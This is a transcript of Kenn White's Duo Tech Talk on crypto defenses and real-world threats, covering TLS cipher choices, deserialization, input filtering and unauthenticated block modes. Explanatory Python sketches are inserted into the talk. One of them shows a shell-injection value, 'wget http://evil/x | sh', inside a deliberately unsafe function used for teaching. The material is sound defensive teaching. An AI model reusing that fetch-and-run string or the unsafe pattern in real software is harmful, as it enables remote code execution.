Crypto Defenses for Real-World System Threats – Kenn White – Ann Arbor


– All right, if everybody
can wander towards a seat. Don’t be shy, head to the front. Wendy Nather is here, she’s very friendly. Everybody, front row is wide open. Plenty of seats up front guys
if you wanna join us up here. Okay great. Well I wanna first off welcome
everybody to Duo Tech Talks. We have a very special
guest tonight, Kenn White. Really happy to have him here, it’s gonna be a great
talk on real-world threats and crypto-systems and how
to deal with those things. So thank you Kenn for joining us tonight. Thank you all for attending. Thanks to everybody who’s
joined us on the live stream. My name is Mike Hanley I’m the
senior director of security here at Duo. This is Duo Tech Talks, which is our monthly tech talk series. If you’ve been here before in Ann Arbor, generally we have a speaker
come in about once a month, typically on security topics
though we do tend to cover other things that are not
security related as well. And we’ve also hosted Duo Tech
Talks in our other offices in San Mateo, Austin
Texas, and over in London. Before we get started with Kenn’s talk, any announcements, shout-outs,
greets from the audience? Zoe. – Hi, there we go. Hi I’m Zoe and I think you
probably saw the slide up here when we were getting started. But we’re hiring so if
you like this office and you like pizza which is
a frequent appearing item at this office, and you love security, you should check it out because we’re a pretty
great place to work. – Any other shout-outs? – [Man] There’s a healthcare
hackathon coming up in June, June 23rd to 26th. You can find out all about it
if you google A2 health hacks, or they’re on Facebook as well. And they have a monthly,
one more monthly mixer and mini-hack coming up
that’ll be announced as well. – Awesome, thanks Ted. – [Man] Probably all of
you already know about this but A2 New Tech April meeting
is next Tuesday, 6.30. It’s always the third
Tuesday of every month. – Other announcements, shout-outs? Weather forecasts. Okay, all right. Well again thanks everybody for coming. So it’s my pleasure to very
quickly introduce Kenn White. For those of you not
familiar with Kenn’s work, Kenn does a substantial amount
of work in the crypto space and the vast majority for the public good. If you’re not familiar with works like the orchestration of the TrueCrypt
audit from several years ago. People lost confidence in a very sort of foundational piece of open
source security software. Kenn was one of the folks who
stepped in to help make sure that that got audited, and
he’s also currently involved in the OpenSSL audit that’s underway. So lots of exciting work. Kenn’s also done a lot
of other interesting work in consulting and sort
of broad scale impact in the security community so
we couldn’t be more excited to have him joining us here at Duo tonight to talk about crypto defenses
and real-world system threats. So without further ado Kenn, thank you. – Thanks Mike. (applauding) Appreciate it, this is a great turnout. All right so let’s dive in. The, I’ve got quite a
bit of material to cover and we can go kind of as
deep or sort of as high-level as you like and hopefully
we’ll take lots of questions at the end. So this is just sort of the general flow I’d like to kind of follow. Just a tiny bit about me. I’ve got a really weird background. I imagine a lot of people in this room probably have a weird
background for, you know, how you ended up. My formal training’s in
computational modeling and imaging and machine learning
around signal processing and expert systems. When I was doing some graduate work at NIH I got involved in some
safety-critical system work, and then eventually sort
of stumbled my way into the health care space
and clinical research and ended up working on
sort of one of the largest clinical research networks in the world, and owning defense and
operations for that. So that’s, I spent many
many years in the Linux and network world to sort
of get to where I am now. And then more recently,
I do spend a lot of time on applied crypto, as Mike indicated. If you’re not familiar with it, check out Open Crypto Audit, that’s one of the non-profits
I’ve been involved with and it’s, there’s some
great work we’ve done there. So let’s dive in. So in the world of applied crypto and in security in general. Actually more in terms
of security in general, we are often misunderstood. This was about a year and a half ago. Actually, I guess, it’s
about a year and a half ago. This is Ellen Nakashima,
she’s a pretty well-regarded National Security reporter
for the Washington Post, and she was quoting Director
Comey, and I love this line. So Comey’s line was, “There’s no doubt the use of encryption “is part of terrorist tradecraft now. “It’s a feature especially of
ISIL’s or ISIS’s tradecraft.” To which Matt Blaze
responded, that’s true, Crypto’s also part of consumer tradecraft, business tradecraft and critical
infrastructure tradecraft. (laughing) But we see, you know, we see
these sort of simple narratives kind of repeated quite a bit. I’m not sure if people are familiar with the American Enterprise Institute. It’s a pretty well-regarded,
central maybe, slightly right, slightly left
depending on who you talk to, think tank in DC, but it’s,
they’ve got a really deep bench of respected scholars. This came out a few months ago. Title of the story was How Data
Encryption Helps Terrorists. (laughing) And I couldn’t help myself
but click on that little lock, because if you do click on
that little lock you see your connection to
aei.org is encrypted using modern cipher suite. And it was actually a
pretty decent cipher suite. But so humans are the hard part right. I saw this, I saw this
little snippet a while back and I thought this was beautiful. So this guy’s getting, has
his whole family come in for a Super Bowl party. Like relatives were driving from all over, they were super-excited. And the problem was when
they actually went to use their new DVR and get everything going, it just didn’t work. He had like an entire box of
cables and switches and things and it just didn’t work. So this is what was engineered. On the bottom is a little
playing card deck and a camcorder that’s shooting at an iPad
that’s tied into S-Video cable. (laughing) Those people were able
to watch the Super Bowl. One of the things I’ll talk
about a little bit later is, in terms of formal
methods and verification and formal proofs of security guarantees. The problem is often those
are either very circumscribed or they’re isolated sort of
absent, the larger picture. You can imagine lots of
different security threats. I’m not sure how many of
us would’ve thought of this security threat. (laughing and groaning) Right. So we’re all, you know, we’ve all gone through
the security training and we have, you know, we’re
sort of aware of phishing and we’re really careful about
clicking on suspect links and things, so this was, I
think near the end of last year. IBM, as you can imagine, IBM
Global has a really substantial malware R&D group and they
did this, they did a report on the sort of interesting new
bot, the Bilal Bot malware. Anyway, wrote a whole piece,
you know, analysis on it. In the old days we sort
of focused on signatures and maybe heuristics and, you know, there’s sort of a standard
approach of how you think about adversaries, but it’s basically an
unknown, you know, actor. In this case the author
of that piece of malware was so incensed that IBM got it wrong and in some of the
particular technical details that he was really proud of, he ended up emailing the
lead author of this post, and basically, he became
his own PR Officer, and then he contacted like
a whole bunch of different, you know mainstream, you know Wired and Ars Technica and things. But I mean this is the,
the lead security analyst was getting, you know,
basically PR pitches from the very malware author,
the guy that he wrote. It’s just a different
way of thinking right. (laughing) Yeah right. Well actually, I studied this for an embarrassingly long amount of time. I’ve no idea what mail program that is. This is a screenshot
in the follow-up piece that the guy wrote. I’m like, is that some
Lotus Notes, like something ancient, I don’t know. (people talking over each other) Is it? Oh, that’s fantastic, it’s GoDaddy’s webmail. All right. I’ve got a whole thing on GoDaddy a little bit later. (laughing) All right. So you know, a lot of times
we have really creative people on the marketing product side, but translating security
properties and guarantees and some of the technical
nuance is difficult. There are innocent mistakes and then there’s sort of snake oil. So this is cyberghostvpn.com. The data you send will all be encrypted with 256 bit encryption and
it might take all those years or it might take three
seconds, because it turns out they published their pre-shared keys and their default allows null ciphers and there’s
just a whole series of other problems, so yes it might take to the end of eternity, but probably not. This I saw in a survey. I don’t remember what
the security product was. And I stared at this for
a long time and I thought. How do you not know if you drive a car. And what information
was the security company trying to get to. So this is another product
that I heard a bit about. Brigade point of sale. Their shtick is they
sort of integrate with larger points of sales. So these, you know, the credit
card swipes at retail stores and things, and their whole
thing is that we are the leader in stability and ease of use, and they had this big media story come out and then when you went to
their home page you got error establishing a database connection. Yeah. In their case it was, in
their case it was yes. So, you know, qualifying what things do. What assurances exist and what, what protections are afforded versus what may not be afforded. Sometimes people like Dan
Guido call these anti-features, and I love that phrase, because if you, if a product
talks about NSA proof or hacker proof, some of
these sort of silly, you know, sloganeering terms, those are signals, they’re trust signals. Now they may be in isolation
but usually they cluster with a whole bunch of other
things and so, you know. But anyway, good UI is critical. This is one of the best
examples of UI I’ve ever seen. (laughing) Not only will this kill you, it will hurt the entire
whole time you’re dying. We should all have, you
know, UI that crystal clear. This was a, I thought, a sort
of insightful observation that a lot of times when
we see sort of defects and maybe catastrophic product failures, or sort of embarrassing examples, that it’s not always a
technical problem in fact, in my experience, often
it’s not a technical problem it’s a decision, it’s
an incentive trade-off that someone made, that
a human being made, and often that’s a management decision, which is why when a, I believe
this was New York City, local television station
that had just invested over $10 million in high
definition weather satellite gear and forecasting things, during
a live broadcast we got that. (laughing) Someone at some point
made a decision to not put a GPO policy on, to let that one slide. To you know, to offload the
problem to the contractor, I’m not sure, not good. I’ve got a couple of other examples here in terms of communication, this is great. So what do you think the
instructions read to the bakery for that cake. (laughing) Happy birthday Kilo with
Darth Vader drawn underneath. It’s probably not what
they really intended. The other one, this is
one of my favorites is. Guy goes into a bakery,
has picture, you know, ’cause modern bakeries
have these ink-jet printers that are kinda like icing
jet printers right, and said I’d like the cake to look like this. So they made the cake
look like the USB stick the guy handed. (laughing) Okay. All right. So there are things that happen where we think we have an
understanding of what we call security boundaries or trust boundaries. There is this notion, I suspect it’s not quite as prevalent here
but I see this a lot in the Fortune 500 with
systems people or ops people who make this really strict
delineation between open source and sort of, you know,
commercial or off the shelf you know, proprietary systems. You get this a lot in
like the hardware end, hardware network sort of space. Cisco for example. So I’ve had these conversations
with system administrators where it’s like, no I don’t
deal with open source, I’m, you know, strictly a Cisco guy. Strictly a Cisco guy,
let’s break that down, ’cause on my phone,
when I have a Cisco VPN in your balance statement
you’ve got credits for OpenSSL and libcurl. So you are running
actually lots of software that you may not be aware of. There’s this notion of
supply chain right so, where chips come from,
where processors come from, where maybe different OEM
kind of integrations happen, whether it’s software or hardware. But you know there’s also this notion of a security supply chain and I think, I think we should think
about that more often because even people who have been,
like, really experienced Linux administrators or
assessment people for years, they may not really quite appreciate how many levels of
dependencies are in the stack, and things that have been
sort of untouched for years. That’s one of the reasons
that we work with a, the Linux Foundation’s Core
Infrastructure Initiative to work on the OpenSSL project, but there’s lots of others. Libcurl’s one of the sort
of cornerstone pieces that lives everywhere. And also, you know, people
have this mindset sometimes. I thought this was an interesting thing. If you talk to, so I don’t know
if people are familiar with the FizzBuzz test. Right, so if you’re a deeply geeky engineer, you know that some companies use this as sort of an interview question. It’s a simple programming problem that’s meant to see if you can understand some basic operations of looping and modulus constructions, things like that.
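
To make that concrete, here is a minimal FizzBuzz sketch in Python, just as an illustration of the kind of looping and modulus logic the question is probing:

    # FizzBuzz: count 1..100; multiples of 3 print "Fizz", multiples of 5
    # print "Buzz", multiples of both print "FizzBuzz", everything else prints itself.
    for n in range(1, 101):
        if n % 15 == 0:
            print("FizzBuzz")
        elif n % 3 == 0:
            print("Fizz")
        elif n % 5 == 0:
            print("Buzz")
        else:
            print(n)
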
Anyway, I’ve heard these conversations between people that are like, why do real programming versus design or HTML or CSS or modern DOM development? Okay, well, this is CSS, straight CSS, that can solve FizzBuzz, right, it’s Turing complete. The basics of sort of skinning the cosmetic appearance of a page, that’s been long since bypassed. I mean some of these are
deeply nuanced technical, you know, skillsets. How about this one. This is the bane of web design, or sorry, web application everywhere, right. And by the way, for the record, I’m either crazy enough or
dumb enough to actually have worked on a system that was
JavaScript and DOM based, that did cardiovascular analysis
and so had to worry about things like microvolts and
microseconds on EKG waveforms and things like this which
are crucially different. But let’s talk about threat models. What does that mean exactly, because security people say that a lot. Well the first thing is it
means understand your adversary. Is your adversary the
nuclear sub or the dolphin? How about this one, no chew deterrent. (laughing) This was an example of not
understanding your adversary, at least bad product
design, I’m not sure which. So, in terms of trust signals, a lot of times when we look at
maybe a promising application on mobile or a tablet, you know, people put some degree of faith,
maybe with some skepticism, in the ranking systems online right, which apps are quite popular. I think Apple, when
they first started out. By the way, just historical point, when the iPhone first came
out there was no App Store, so there was a whole lot
of things that you have now that wasn’t on the first
Apple iPhone, excuse me. But when the App Store was put in place, I guarantee you some
really really smart people sat around and thought
about potential threats and vulnerabilities and so forth. But I’m not sure they
thought about this one. So this is a person going through and putting in fake reviews
but from real devices, that have actually been
registered per device, to game the play store, and
we’ve seen similar things with iOS apps. And now let’s talk about users right. Rocks, riptides kill unwary Asian visitors on Australian beaches. Look at that guy on the left. Well we can mitigate that
right, there’s a sign. All right. But these things are trade-offs right so we talk about engineering trade-offs. Sometimes risk is, is worth the reward. In this kid’s case she was going for it. I love that face. So a few months ago there
was an announcement that, I think in the order of 850,000,
900,000 routers in Germany were rooted and were forming botnets, and so when people dove
into it one of the most common home routers, for
cable company in Germany, had, I don’t know if
this was well documented, if this was meant for manufacture
updates, I’m not sure, but basically on a single
post, on a single HTTP post, properly crafted, what was
supposed to be a SOAP envelope, you could just run arbitrary
shell commands, right. You could just backtick and run and get a payload, do a drop or bring it down, and so on.
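
That bug class is worth spelling out. A hedged Python sketch, where the field name and the ntpdate call are just stand-ins for whatever the firmware actually did: dropping an untrusted SOAP field into a shell is game over, and the safer pattern avoids the shell entirely.

    import re
    import subprocess

    # DANGEROUS (illustrative): an attacker-controlled SOAP field interpolated
    # into a shell command. A value like `wget http://evil/x | sh` (backticks
    # or a semicolon) runs arbitrary commands on the box.
    def set_ntp_server_unsafe(value_from_soap: str) -> None:
        subprocess.run("ntpdate " + value_from_soap, shell=True)

    # Safer sketch: validate against a strict allow-list, then pass the value
    # as a single argv element with no shell involved at all.
    def set_ntp_server_safer(value_from_soap: str) -> None:
        if not re.fullmatch(r"[A-Za-z0-9.\-]{1,253}", value_from_soap):
            raise ValueError("invalid hostname")
        subprocess.run(["ntpdate", value_from_soap], check=True)
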
But threats vary tremendously by intent, right. Your threat is probably not my threat. My threat is definitely
not the people on the left because I’m never going to
do that, just for the record, I’m not going to jump
out of a plane with them. Let’s talk about snake oil. People know that term in general? Right, so it’s from the, you
know, the days of the wild west you know and people would
sell these potions or linemins or whatever, that were promised to do all kinds of crazy things. We see that a lot in the product security, in the security product space. Justin Schuh from Google
had this fantastic quote which is when I talk to security, to people about security
products, this is a helpful start. I love the helmet too. I mentioned before about trusting signals, trust signals right. If any of you follow me on Twitter, for some reason I’ve sort
of become drawn to, like, you know, like a moth to
light with really bad VPNs and like, you know, really
bad products and things. But part of the thing that
I’ve discovered in seeing how, just how like, a cesspool the consumer VPN service
provider space is, is it finally occurred to me that you can put aside the technical
characteristics or signals, it’s crucially important to understand the business signals too
right, the ethics signals, the trust signals, because if you say, for example, you have battle-tested
military-grade encryption, I’m gonna think of this. I’m not gonna think of this,
and this is actually, probably, the more real threat
when you’re, for example, traveling in a really sketchy hotspot. It’s hard to read this
so I’ll do this kind of from the inside out. My Uber driver was describing
how drivers coordinate to engineer surge prices. Say a big event finishes,
drivers know this, so they shut off in unison. The algorithm responds with surge pricing because of an artificial fall in supply,
then drivers turn on the app and snap up the rides at a higher rate. And someone says, you
know, humans are adaptive. Wells Fargo, if you remember
the story from, I think, a year ago or so. Yeah so 5300 employees were
fired for making up accounts. So customers would come in and
they’d just make up accounts and create check in accounts
and create other things without actually bothering to tell people ’cause there’s some
weird sales incentive or compensation incentive or something. Thousands of people did
this for like years. Anyway, the top line is the
most important one which is give humans a system and they’ll
game it, the end, period. Hmm, I like that. Humans will always game the system. We have to think about this in a lot of different ways right. How many of us do worry about
tainted input on web forms or, you know, public-facing interfaces, whether it’s an API
endpoint or a, you know, some other kind of web service. Do you blacklist or white list? (laughing) There’s no unicycle rule right. Humans will always game the system. This is what I’ve sort of come to assume that most adversaries do. Some are really sophisticated
and some just break things. I saw this last spring for filing and I thought he was sort of joking right. So Tadhg O’Higgins, with
an apostrophe in his name, says it’s 2016 TurboTax,
you just lost a customer. And he has a little screenshot
of last name O’Higgins, and it says invalid entry. I was like, all right,
so I click on his profile and he really is from Ireland. And I was like it can’t be that bad. So this was like six months
later I went to check. Yeah it’s still bad. So they’re blocking hyphens, and why do you think they
might be blocking hyphens on a web form? Because somebody believes
that somewhere downstream that’s gonna be rendered and
maybe you could do bad things. Maybe you could do cross-site scripting, maybe you could do other
kinds of bad things. That is a terrible,
terrible way to design it, much less to attract customers. And plus, it’s futile anyway, right. There are 70 different unique ways to encode the less-than symbol in HTML. Maybe you need to work on filters, and templates, and data-flow modeling throughout the application, rather than trying to stop what could be a trivial switch to a different encoding.
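
Rather than rejecting characters on input, the usual advice is to encode on output. A minimal Python sketch of the idea, standard library only (the render function is hypothetical, just for illustration):

    import html

    def render_greeting(last_name: str) -> str:
        # Accept names like O'Higgins as-is; neutralize them at output time
        # with context-aware escaping instead of blocking characters up front.
        return "<p>Welcome back, " + html.escape(last_name, quote=True) + "!</p>"

    print(render_greeting("O'Higgins"))           # <p>Welcome back, O&#x27;Higgins!</p>
    print(render_greeting("<script>x</script>"))  # the tags come out inert
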
Let’s talk about history a little bit. So I posted this a few months ago. This is one of the stranger things I’ve seen. Now if you’ve been playing in the network world, or you know your BSD history, you know that one of the few remote exploits for OpenBSD was in their IPv6 implementation. This is below TCP and UDP,
this is layer three. So just having a server, no open sockets needed, you can exploit it. But I’m not talking about OpenBSD, I’m talking about an
internet of things embedded piece of hardware that
made the same mistake about 10 years later, right. So this is latest, greatest, you order it, these are tiny little
embedded crypto chips and hardware chips they have embedded. You know, purpose built network stacks. Purpose built operating systems. This is the most fundamental
basic level of, you know, part of the stack, and
this vendor was basically reinventing the wheel in
terms of its vulnerability from, yeah, 2007. Let’s talk about Windows
because, by the way, this isn’t in any way meant to
slam sort of the Linux family or, you know, heritage or whatever. You see this about once
every year and a half or so. If a Patch Tuesday bulletin uses the phrase, all versions of Windows, there’s almost always something interesting going on. So this example is what
a sophisticated attacker would have to do to exploit
this particular one. This was a media file extension
that went all the way back to I think, I’m not sure
if it was Windows 98, but definitely Windows 2000, and basically a single text line, call that and you can run, you know, local privileged executables,
but through a webpage. Ouch. There are dependencies
and there’s core code and there’s sort of, you know, critical well-established
but kind of uninspected, unlooked-at, sort of ignored pieces in all these operating systems. Let’s talk about deserialization. If you’re into OWASP, or
you’re a CISSP type person, this is probably second nature, you know, old hat. So deserialization is the way in which applications will take streams of data and basically parse them and use them. The problem is there
are many, many examples. Oracle quarterly puts out around 180 to 200 remote exploits every quarter, like clockwork, across their whole product suite, because somewhere in the Java stack there’s unfiltered, what was assumed to be trusted, data which is actually used to execute code.
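
The same bug class shows up anywhere a program rebuilds objects from bytes it didn’t produce. A hedged Python sketch of the pattern, standard library only:

    import json
    import pickle

    # DANGEROUS (illustrative): unpickling attacker-supplied bytes can execute
    # arbitrary code, because the pickle stream can tell the interpreter to
    # call objects (via __reduce__) while it reconstructs the data.
    def load_session_unsafe(blob: bytes):
        return pickle.loads(blob)

    # Safer sketch: a dumb data format plus explicit validation of the fields
    # you expect, so the parser never runs attacker-chosen code.
    def load_session_safer(blob: bytes) -> dict:
        data = json.loads(blob.decode("utf-8"))
        if not isinstance(data, dict) or set(data) != {"user", "expires"}:
            raise ValueError("unexpected session structure")
        return data
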
This is just a tiny sample of some of the products involved. On the commercial side, I mean, this is the Fortune 500, and this is the gift that keeps on giving, because it’s not like people are gonna rip out their payroll systems or rip out their SAP implementations. These are fundamental, difficult problems which require a really different way of thinking about public-facing pieces. As I said, they’re everywhere. Now you might be saying, all right, well, I love this expression,
it’s a Polish idiom, not my circus, not my monkey. You might be saying well
that’s not my problem, I’m a actual security engineer, I’m an actual, you know, developer. I, you know, that’s fine,
but we don’t, you know, we don’t deal with these. But you should be thinking
about it because a lot of times this expression they
teach in medical school, to first year medical students. If you hear hoof beats, maybe
you should think of horses instead of zebras, right. The, the post-mortems on 100 different, engagements from Praetorian, and this was done like a year ago I think. These aren’t super sophisticated right. These, some of these date
back to the 90s in terms of vulnerabilities in the systems. You know like, all right. Let’s get onto the crypto, what does this have to do with crypto? One of the things it has
to do with crypto is, crypto is one small part of a tool. It’s one tactic that can be used in a larger understanding of threats in different adversarial spaces. But crypto is a little special. So Maciej Ceglowski, I don’t
know if you guys know Pinboard, it’s like a book-marking
site, anyway he’s a really, this is the guy that founded,
sort of a pretty well-known kind of internet
celebrity for his writing. This is a, this is one of the best quotes I’ve ever read on crypto. He’s talking about the
Matasano CryptoPals Challenge. So if you’re not familiar
this was something that Thomas Ptacek and a couple of other people, while they were at Matasano, put together, and it’s like, it’s like
an increasingly difficult series of problems. It’s, they’re open to the
world, anybody can try it, even if you have no
background in programming, or even if you, you know, maybe you’re really skilled in
Python or Java or something, it’s a great excuse to
like learn a new language. So it starts out, here’s a line from a, I think it’s a Vanilla
Ice rap song or something. Like here’s just a simple
sentence encoded in Base64. Here’s a simple sentence,
convert it to, you know, perform a hash on it. Like very basic, simple things, and it kind of advances to manipulating things and doing padding oracle attacks, and interesting, you know, other kinds of attacks and things.
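
To make those warm-ups concrete, a tiny Python sketch of the sort of thing the early challenges ask for, standard library only (the lyric is just a stand-in):

    import base64
    import hashlib

    line = b"Ice ice baby"
    encoded = base64.b64encode(line)              # b'SWNlIGljZSBiYWJ5'
    decoded = base64.b64decode(encoded)           # round-trips to the original bytes
    digest = hashlib.sha256(line).hexdigest()     # a simple hash of the same sentence

    print(encoded, decoded, digest, sep="\n")
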
But you sort of progressively build up to it. Anyway, as he’s working through this, this is his write-up
on that sort of journey that he went through, there’s no difference from
the attacker’s point of view between gross and tiny errors. Both of them are equally exploitable. In at least three of the challenges, the mere fact of getting
distinguishable error messages was enough to recover the entire message. In other words to break the entire crypto. This lesson is very hard to internalize. In the real world, if
you build a book shelf and forget to tighten one
of the screws all the way it does not burn down your house. Absolutely true and we
see this all the time with some of the incremental
changes that have happened with SSL, and we’ll get
into that in just a second. All right so let’s kinda dive in. I’ve got a map, a few slides
back and folks are welcome to pull that from GitHub. It’s a, you know, it’s a pretty decent vector map that you can
like zoom in and stuff. These are kind of ways that
I’ve been thinking about modern crypto defenses, sort
of broad categories right so. We worry and think about ways to protect data coming across the network. We think about how we can
protect disk and volume. We worry about how we can protect files. How about memory encryption? How about data and use encryption and hardware security modules,
so let’s dive into that. And I’ll spend a fair
amount of time on this. I imagine as crypto goes, that network transport
is probably something that people care about a lot. It’s certainly something I’ve
been focusing on quite a bit. SSL, TLS, IPsec, VPNs, SSH, these are common, you know,
tools and protocols that we use all the time. What are some of the guarantees, what are some of the
properties of these things? Well data exposure
right, network intercept, credential theft,
identity theft and so on. The compliance is also
worth thinking about. I used to think compliance
in sort of a different way. I actually think of it as an adversary now, because if you’ve done audits and kind of real-world inspections, a lot of times you’ll see organizations, you’ll see this in the government, you see it in sort of larger, excuse me, Fortune 500 companies. It’s as if there’s a checklist mentality. It’s as if the, meeting the
compliance by itself is enough when I think hopefully
everybody in the room knows that what the real goal is,
is actual security right, is to keep the bad guys out
and keep customer data safe. But, so in that sense, I
think of it as an adversary, because there are things that sometimes you’re required to do that may not make sense, and so we’ll talk about that in a second. This is a map of Internet
Explorer, Firefox and Chrome, common root certificate authorities. And the sort of literal web of trust among those that are kind of defaults, that are installed in modern browsers. I’ll get back to this
in just a second but, bracket that for a second. Did you know that, so when
you saw Ubuntu, for example, one of the defaults is
localhost.localdomain, right. I mean it’s a very common
thing if you’ve installed VMs before. There’s an entire top level
global domain called .host. I registered localdomain.host. You can, in one of the
attacks that we’ve seen, there are variations with, what are they called, homograph attacks, where it looks like Gmail but with a Cyrillic i, or a Google service account or something with, like, you know, a slightly off, you know, a different character set. That’s kinda weird.
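
A rough Python sketch of why those look-alike names matter: the Cyrillic letter below is a different code point from the Latin ‘a’ but renders almost identically, and the IDNA/punycode form gives the game away:

    # The second string uses U+0430 (CYRILLIC SMALL LETTER A) in place of 'a'.
    real = "gmail.com"
    fake = "gm\u0430il.com"

    print(real == fake)                     # False, even though they look alike
    print(fake.encode("idna"))              # an xn-- punycode label, exposing the swap
    print(any(ord(c) > 127 for c in fake))  # True: a cheap red flag for look-alikes
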
So I’m not sure if people followed the WoSign story a while ago. This was a few months back. WoSign is a major certificate authority, it was trusted by your
Android, your iPhone, all the modern operating systems. They issued bogus certificates
for GitHub and for, I think, the University of California, and I think a couple of others. And when people went to sort of do the investigation on how some of
these certificates were issued, it lead to this whole
chain of kind of like a comedy of errors, to the
point where they were actually pulled from the root stores
from some of the major browsers. It’s sort of the nuclear
option if your business is, you know, certificate authorities. Ivan Ristic, if you know the OpenSSL, or sorry, the SSL Labs test,
this is a great model. We’ll have links afterwards
but this is sort of his view of kind of the threat
architecture and threat map for SSL and some of the
properties that’s guaranteed. Let’s talk about integrity. We’ve seen a lot of stories
with funky names right, like FREAK and POODLE and
some of these other things that have made the headlines. One of the things that we’ve discovered over the last several years is
that some of our assumptions about the way that block encryption works, for example, over the web with HTTPS, TLS, were naive, because I
think people know this, but just to reiterate: AES, for example, doesn’t encrypt files, right. It doesn’t encrypt any sizeable amount of data. It encrypts a few bytes at a time, and so any implementation has to take, whether it’s a short string or a long string, a binary stream, a file, whatever it is, and put it in chunks, and block these together, deal with padding, maybe deal with compression, and do it in such a way that the receiver, you know, can make sense of it.
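
A hedged sketch of that point, assuming the widely used Python cryptography package is installed: the raw AES primitive only transforms exactly 16 bytes, and everything else, chaining, padding, authentication, is the job of the mode around it.

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(32)                # an AES-256 key
    block = b"exactly 16 bytes"         # one 128-bit block, no more, no less

    # ECB is used here only to show the bare primitive; it is NOT a safe mode.
    encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    ciphertext = encryptor.update(block) + encryptor.finalize()
    print(len(ciphertext))              # 16 -- one block in, one block out

    # Anything longer needs a real mode (ideally an authenticated one like GCM),
    # padding rules, and chaining decisions -- exactly where implementations slip.
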
There’s been a whole history with unauthenticated block modes. So this is another reason why you should actually think about what things mean. So when you see product
literature that talks about we have AES at 256 bit security level, it’s kinda like saying you have a V6 and so your car has to be great. Has nothing to do with whether
your car’s great or not, it’s one tiny element
which can be screwed up in a whole lot of different ways. There’s a, there’s a
project called ZeroDB. It’s supposed to be, it’s a way of somewhere between tokenizing and property preserving encryption that made a lot of interesting promises. They sort of held back
for like a year and a half after they launched before
opening up to, you know, the source code. And when they did, I think
within the first 24 hours or so, this was a thread on Reddit, someone took a look and
said, this is really broken. This is broken because you’re not using authenticated block modes, which means, if your cookie says, for example, Username=Bob, Admin=0, I can literally do a really simple XOR and change your cookie to Admin=1, or my cookie to Admin=1. That’s a problem.
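
A hedged sketch of the fix, again assuming the Python cryptography package: with an authenticated mode like AES-GCM, flipping bits in the ciphertext doesn’t quietly turn Admin=0 into Admin=1, it makes decryption fail outright.

    import os
    from cryptography.exceptions import InvalidTag
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)
    cookie = b"user=bob;admin=0"

    ct = AESGCM(key).encrypt(nonce, cookie, None)

    # Attacker XORs one ciphertext byte, hoping to flip the trailing '0' to '1'.
    tampered = bytearray(ct)
    tampered[15] ^= ord("0") ^ ord("1")

    try:
        AESGCM(key).decrypt(nonce, bytes(tampered), None)
    except InvalidTag:
        print("tampering detected")     # the tag check fails, so the flip is rejected
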
We can’t talk about, there’s not time to get into, all the different
implementations of, sort of, modern cipher suites, but
let’s spend a second on these. So when I think, in my mind,
about real-world endpoint TLS, it’s this, it’s sort of the DevOps folks. Like what is, what are the
actual, you know, environments, platforms, tools, that
we’re talking about. Web servers, proxy, we’re seeing
more systems written in Go. Excuse me. Elastic load balance with
AWS, CloudFront and so on. And global CDN’s. Has anyone, just roughly by show of hands, configured an SSL webserver before? Some of these look familiar? Anybody get this feeling that like there’s an unbelievable amount of too many options that you have no idea
what any of them mean? You’re not alone. There are people who talk about crypto flexibility or,
there’s a way to confuse modularity which in general,
with systems and programming, is a good thing right,
as we’re all taught, but with unnecessary
and dangerous options. So right now you’re probably
not gonna see a few of these. And by the way, Twofish and Blowfish. Blowfish is, it doesn’t
really apply to TLS, it is an option for
VPNs but I’ve seen some bizarre, bespoke atrocities
in PHP and other things that were done with
Blowfish to like sort of a homemade TLS and you can
call anything, you know, any acronym you want,
I guess, but so that’s, that really is more
applicable to VPNs but. So let’s assume that in 2017 we’re not talking about SSL anymore. I use SSL by the way as a, as sort of a catch-all and a, you know, pedantic person would say
well, that’s not really true. There, we came like this close
to naming TLS 1.3, SSL 4. So if you really want to get pedantic I’m happy to sit with you
for a few cold beverages and have that conversation. Triple DES and RC4, totally broken right. Even two years ago, myself, Red Hat, I mean, lots of people and
organizations were still saying, you know, this is a hanger-on. These are pieces of
encryption, cipher suites, that we need to use for XP,
for older Android and so forth. In 2017, that’s not so true. But here’s some things
that you may not know. RSA is deprecated. Not RSA certificates, those
are gonna be with us for, till my grandkids come round I think. But RSA handshakes. You may be thinking you’re
crazy that’s RSA, like what. No, there are now I
think in the 19th draft, we’ll see it in a second,
the new TLS standard, RSA not allowed, just not
allowed as a handshake. And in fact even
Diffie-Hellman is deprecated. What? Well, static Diffie-Hellman, not ephemeral, elliptic-curve Diffie-Hellman. CBC, CBC is probably 60% or more of the world’s, you know, network block mode chaining. Or sorry, block modes. No. CBC’s a problem. CBC’s been a problem for many, many years. If some of these names look familiar, BEAST, CRIME, TIME, BREACH, Lucky 13, and so forth, it’s because we’ve been
monkey-patching a lot of things but fundamentally the way
in which you construct more than just a few bytes at a time, even some of the best in
the business get it wrong and have gotten it wrong, and every major operating
system, and every mobile carrier, and every big network company
gets it wrong, and has, to the point where the, the defaults and what were
allowed in SSL 3 for example, we just said you can’t,
SSL 3 is deprecated, you can’t use it. How about Triple DES and Blowfish? Yeah, they’re broken. This was, I think, four
or five months ago right, the Sweet32 attack. That said, there are some caveats right. This is probably not your biggest problem. This is a quote from the Sweet32 team. So we show the network
attacker who can monitor a long-lived Triple DES HTTPS connection between a web browser and
a web site can recover secure cookies by
capturing around, how many? 785 gigabytes of JavaScript traffic. Now if you’ve got one
attacker that’s hitting your web server with
785 gigabytes of traffic to recover a cookie, I would hope you’d block
them before they got into the terabyte level. But that’s probably not, probably
not really your adversary. But the game is rigged right
’cause how do you know. And good data is hard. This is the Verizon data
breach investigation report from last year. It’s, I think, generally
considered like, you know, really well-respected, you know, credible source of industry information. One of their top 10 exploits
was FREAK, so they claim. This is a quote by, from Dan
Guido at Trail of Bits lab, and it’s true, what happened was, between some of the
research down the street at the University of Michigan, and basic ancient network gear, they were getting false positives. False positives so much
so that they were listing one of these fairly esoteric,
if we’ll say attacks, as one of the top 10 that
companies were encountering, that’s not true. Anyway back to, back to our TLS stack. Right so, in addition to the protocol and
the cipher the key exchange, how we look at integrity, the
modes and the certificates, there’s a whole host, I’ve
got like four of these here, there’s maybe eight, nine other kind of extensions enhancements
to the TLS protocols that have kind of come along. You’re gonna see, be seeing
more and more about it I think. People are starting to think about, and we’re seeing more
implementations of native pinning and HPKP pinning. The idea is that, for example, when Facebook or Gmail or, you know, a major web property or application wants to make a secure connection, it’s not just any certificate, it’s tied and fingerprinted to that certificate that they’ve issued. And it’s really powerful.
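
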